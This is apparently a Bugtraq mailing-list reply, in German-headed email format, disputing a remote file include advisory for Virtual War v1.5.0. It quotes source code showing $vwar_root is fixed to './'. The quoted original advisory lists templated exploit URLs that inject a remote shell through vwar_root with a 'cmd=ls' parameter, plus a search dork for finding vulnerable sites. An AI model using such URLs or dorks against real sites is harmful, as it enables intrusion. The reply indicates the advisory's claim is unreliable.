AW: Virtual War v1.5.0 Remote File Include (vwar_root)
How should that be exploitable?
$vwar_root is initialised with "./" in the first line of code after comment.
*snip*
<?php
/*
############################################################################
*
* $Id: war.php,v 1.191 2004/09/09 15:52:33 rob Exp $
*
* This notice must remain untouched at all times.
*
* Modifications to the script, except the official addons or hacks,
* without the owners permission are prohibited.
* All rights reserved to their proper authors.
*
* ---------------------------------------------
* http://www.vwar.de || Copyright (C) 2001-2004
* ---------------------------------------------
*
*
############################################################################
*/
// get functions
$vwar_root = "./";
require ($vwar_root . "includes/functions_common.php");
require ($vwar_root . "includes/functions_front.php");
-----Ursprüngliche Nachricht-----
Von: AG Spider [mailto:ag-spider@xxxxxxxxxxx]
Gesendet: Montag, 7. August 2006 16:45
An: bugtraq@xxxxxxxxxxxxxxxxx
Betreff: Virtual War v1.5.0 Remote File Include (vwar_root)
Title : Virtual War v1.5.0 Remote File Include (vwar_root)
############################################
Discovered By :::: :::: :::: AG-Spider :::: :::: ::::
----------------------------------------------------------------------------
-
Class : Remote file include
Rish : Danger
Application : Virtual War v1.5.0
URL : www.vwar.de
----------------------------------------------------------------------------
-
dork : Powered by: Virtual War v1.5.0
Exploit :
http://www.$ite.com/[vwar_path]/war.php?vwar_root=[Shell-code]?&cmd=ls
http://www.$ite.com/[vwar_path]/member.php?vwar_root=[Shell-code]?&cmd=ls
http://www.$ite.com/[vwar_path]/calendar.php?vwar_root=[Shell-code]?&cmd=ls
http://www.$ite.com/[vwar_path]/challenge.php?vwar_root=[Shell-code]?&cmd=ls
http://www.$ite.com/[vwar_path]/joinus.php?vwar_root=[Shell-code]?&cmd=ls
http://www.$ite.com/[vwar_path]news.php?vwar_root=[Shell-code]?&cmd=ls
http://www.$ite.com/[vwar_path]/stats.php?vwar_root=[Shell-code]?&cmd=ls
----------------------------------------------------------------------------
The Arab Warriors Security Team
- - -[T-A-W-S-T] - - -
Muslims Hackers
greetz4: [ Black-Code - KILLERxXx - KaBaRa.HaCk .eGy - CrAsH_oVeR_rIdE]
c0natct us : AG-Spider [ at ] HoTMail.CoM
thx 2 :::::: Lezr.com & 3asfh.net
_________________________________________________________________
Download the new Windows Live Toolbar, including Desktop search!
http://toolbar.live.com/?mkt=en-gb